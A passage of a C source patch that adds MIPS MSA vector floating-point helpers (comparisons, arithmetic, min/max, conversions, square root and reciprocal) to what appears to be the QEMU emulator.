} + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fcaf_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_af(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcun_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_un(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fceq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_eq(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcueq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ueq(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fclt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_lt(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcult_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ult(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcle_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + 
compare_le(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcule_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ule(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fsaf_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_af(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fsun_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_un(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fseq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_eq(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fsueq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ueq(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fslt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_lt(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fsult_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ult(env, 
pwd, pws, pwt, df, 0); +} + +void helper_msa_fsle_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_le(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fsule_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ule(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fcor_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_or(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcune_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_une(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcne_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ne(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fsor_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_or(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fsune_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_une(env, pwd, pws, pwt, df, 
0); +} + +void helper_msa_fsne_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ne(env, pwd, pws, pwt, df, 0); +} + +#define float16_is_zero(ARG) 0 +#define float16_is_zero_or_denormal(ARG) 0 + +#define IS_DENORMAL(ARG, BITS) \ + (!float ## BITS ## _is_zero(ARG) \ + && float ## BITS ## _is_zero_or_denormal(ARG)) + +#define MSA_FLOAT_BINOP(DEST, OP, ARG1, ARG2, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## OP(ARG1, ARG2, \ + &env->active_tc.msa_fp_status); \ + c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +void helper_msa_fadd_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_BINOP(pwx->w[i], add, pws->w[i], pwt->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_BINOP(pwx->d[i], add, pws->d[i], pwt->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + msa_move_v(pwd, pwx); +} + +void helper_msa_fsub_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_BINOP(pwx->w[i], sub, 
pws->w[i], pwt->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_BINOP(pwx->d[i], sub, pws->d[i], pwt->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + msa_move_v(pwd, pwx); +} + +void helper_msa_fmul_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_BINOP(pwx->w[i], mul, pws->w[i], pwt->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_BINOP(pwx->d[i], mul, pws->d[i], pwt->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fdiv_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_BINOP(pwx->w[i], div, pws->w[i], pwt->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_BINOP(pwx->d[i], div, pws->d[i], pwt->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +#define MSA_FLOAT_MULADD(DEST, ARG1, ARG2, ARG3, NEGATE, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _muladd(ARG2, ARG3, ARG1, NEGATE, \ + &env->active_tc.msa_fp_status); \ + c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ + \ + if (get_enabled_exceptions(env, c)) { \ + 
DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +void helper_msa_fmadd_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_MULADD(pwx->w[i], pwd->w[i], + pws->w[i], pwt->w[i], 0, 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_MULADD(pwx->d[i], pwd->d[i], + pws->d[i], pwt->d[i], 0, 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fmsub_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_MULADD(pwx->w[i], pwd->w[i], + pws->w[i], pwt->w[i], + float_muladd_negate_product, 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_MULADD(pwx->d[i], pwd->d[i], + pws->d[i], pwt->d[i], + float_muladd_negate_product, 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fexp2_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_BINOP(pwx->w[i], scalbn, pws->w[i], + pwt->w[i] > 0x200 
? 0x200 : + pwt->w[i] < -0x200 ? -0x200 : pwt->w[i], + 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_BINOP(pwx->d[i], scalbn, pws->d[i], + pwt->d[i] > 0x1000 ? 0x1000 : + pwt->d[i] < -0x1000 ? -0x1000 : pwt->d[i], + 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +#define MSA_FLOAT_UNOP(DEST, OP, ARG, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## OP(ARG, &env->active_tc.msa_fp_status);\ + c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +void helper_msa_fexdo_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + /* Half precision floats come in two formats: standard + IEEE and "ARM" format. The latter gains extra exponent + range by omitting the NaN/Inf encodings. 
*/ + flag ieee = 1; + + MSA_FLOAT_BINOP(Lh(pwx, i), from_float32, pws->w[i], ieee, 16); + MSA_FLOAT_BINOP(Rh(pwx, i), from_float32, pwt->w[i], ieee, 16); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(Lw(pwx, i), from_float64, pws->d[i], 32); + MSA_FLOAT_UNOP(Rw(pwx, i), from_float64, pwt->d[i], 32); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + msa_move_v(pwd, pwx); +} + +#define MSA_FLOAT_UNOP_XD(DEST, OP, ARG, BITS, XBITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## OP(ARG, &env->active_tc.msa_fp_status);\ + c = update_msacsr(env, CLEAR_FS_UNDERFLOW, 0); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## XBITS >> 6) << 6) | c; \ + } \ + } while (0) + +void helper_msa_ftq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP_XD(Lh(pwx, i), to_q16, pws->w[i], 32, 16); + MSA_FLOAT_UNOP_XD(Rh(pwx, i), to_q16, pwt->w[i], 32, 16); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP_XD(Lw(pwx, i), to_q32, pws->d[i], 64, 32); + MSA_FLOAT_UNOP_XD(Rw(pwx, i), to_q32, pwt->d[i], 64, 32); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +#define NUMBER_QNAN_PAIR(ARG1, ARG2, BITS) \ + !float ## BITS ## _is_any_nan(ARG1) \ + && float ## BITS ## _is_quiet_nan(ARG2) + +#define MSA_FLOAT_MAXOP(DEST, OP, ARG1, ARG2, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## OP(ARG1, ARG2, \ + &env->active_tc.msa_fp_status); \ 
+ c = update_msacsr(env, 0, 0); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +#define FMAXMIN_A(F, G, X, _S, _T, BITS) \ + do { \ + uint## BITS ##_t S = _S, T = _T; \ + uint## BITS ##_t as, at, xs, xt, xd; \ + if (NUMBER_QNAN_PAIR(S, T, BITS)) { \ + T = S; \ + } \ + else if (NUMBER_QNAN_PAIR(T, S, BITS)) { \ + S = T; \ + } \ + as = float## BITS ##_abs(S); \ + at = float## BITS ##_abs(T); \ + MSA_FLOAT_MAXOP(xs, F, S, T, BITS); \ + MSA_FLOAT_MAXOP(xt, G, S, T, BITS); \ + MSA_FLOAT_MAXOP(xd, F, as, at, BITS); \ + X = (as == at || xd == float## BITS ##_abs(xs)) ? xs : xt; \ + } while (0) + +void helper_msa_fmin_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + if (NUMBER_QNAN_PAIR(pws->w[i], pwt->w[i], 32)) { + MSA_FLOAT_MAXOP(pwx->w[i], min, pws->w[i], pws->w[i], 32); + } else if (NUMBER_QNAN_PAIR(pwt->w[i], pws->w[i], 32)) { + MSA_FLOAT_MAXOP(pwx->w[i], min, pwt->w[i], pwt->w[i], 32); + } else { + MSA_FLOAT_MAXOP(pwx->w[i], min, pws->w[i], pwt->w[i], 32); + } + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + if (NUMBER_QNAN_PAIR(pws->d[i], pwt->d[i], 64)) { + MSA_FLOAT_MAXOP(pwx->d[i], min, pws->d[i], pws->d[i], 64); + } else if (NUMBER_QNAN_PAIR(pwt->d[i], pws->d[i], 64)) { + MSA_FLOAT_MAXOP(pwx->d[i], min, pwt->d[i], pwt->d[i], 64); + } else { + MSA_FLOAT_MAXOP(pwx->d[i], min, pws->d[i], pwt->d[i], 64); + } + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fmin_a_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = 
&(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + FMAXMIN_A(min, max, pwx->w[i], pws->w[i], pwt->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + FMAXMIN_A(min, max, pwx->d[i], pws->d[i], pwt->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fmax_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + if (NUMBER_QNAN_PAIR(pws->w[i], pwt->w[i], 32)) { + MSA_FLOAT_MAXOP(pwx->w[i], max, pws->w[i], pws->w[i], 32); + } else if (NUMBER_QNAN_PAIR(pwt->w[i], pws->w[i], 32)) { + MSA_FLOAT_MAXOP(pwx->w[i], max, pwt->w[i], pwt->w[i], 32); + } else { + MSA_FLOAT_MAXOP(pwx->w[i], max, pws->w[i], pwt->w[i], 32); + } + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + if (NUMBER_QNAN_PAIR(pws->d[i], pwt->d[i], 64)) { + MSA_FLOAT_MAXOP(pwx->d[i], max, pws->d[i], pws->d[i], 64); + } else if (NUMBER_QNAN_PAIR(pwt->d[i], pws->d[i], 64)) { + MSA_FLOAT_MAXOP(pwx->d[i], max, pwt->d[i], pwt->d[i], 64); + } else { + MSA_FLOAT_MAXOP(pwx->d[i], max, pws->d[i], pwt->d[i], 64); + } + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fmax_a_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t 
i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + FMAXMIN_A(max, min, pwx->w[i], pws->w[i], pwt->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + FMAXMIN_A(max, min, pwx->d[i], pws->d[i], pwt->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fclass_df(CPUMIPSState *env, uint32_t df, + uint32_t wd, uint32_t ws) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + if (df == DF_WORD) { + pwd->w[0] = helper_float_class_s(pws->w[0]); + pwd->w[1] = helper_float_class_s(pws->w[1]); + pwd->w[2] = helper_float_class_s(pws->w[2]); + pwd->w[3] = helper_float_class_s(pws->w[3]); + } else { + pwd->d[0] = helper_float_class_d(pws->d[0]); + pwd->d[1] = helper_float_class_d(pws->d[1]); + } +} + +#define MSA_FLOAT_UNOP0(DEST, OP, ARG, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## OP(ARG, &env->active_tc.msa_fp_status);\ + c = update_msacsr(env, CLEAR_FS_UNDERFLOW, 0); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } else if (float ## BITS ## _is_any_nan(ARG)) { \ + DEST = 0; \ + } \ + } while (0) + +void helper_msa_ftrunc_s_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP0(pwx->w[i], to_int32_round_to_zero, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP0(pwx->d[i], to_int64_round_to_zero, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, 
pwx); +} + +void helper_msa_ftrunc_u_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP0(pwx->w[i], to_uint32_round_to_zero, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP0(pwx->d[i], to_uint64_round_to_zero, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fsqrt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP(pwx->w[i], sqrt, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(pwx->d[i], sqrt, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +#define MSA_FLOAT_RECIPROCAL(DEST, ARG, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## div(FLOAT_ONE ## BITS, ARG, \ + &env->active_tc.msa_fp_status); \ + c = update_msacsr(env, float ## BITS ## _is_infinity(ARG) || \ + float ## BITS ## _is_quiet_nan(DEST) ? 
\ + 0 : RECIPROCAL_INEXACT, \ + IS_DENORMAL(DEST, BITS)); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +void helper_msa_frsqrt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_RECIPROCAL(pwx->w[i], float32_sqrt(pws->w[i], + &env->active_tc.msa_fp_status), 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_RECIPROCAL(pwx->d[i], float64_sqrt(pws->d[i], + &env->active_tc.msa_fp_status), 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_frcp_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = 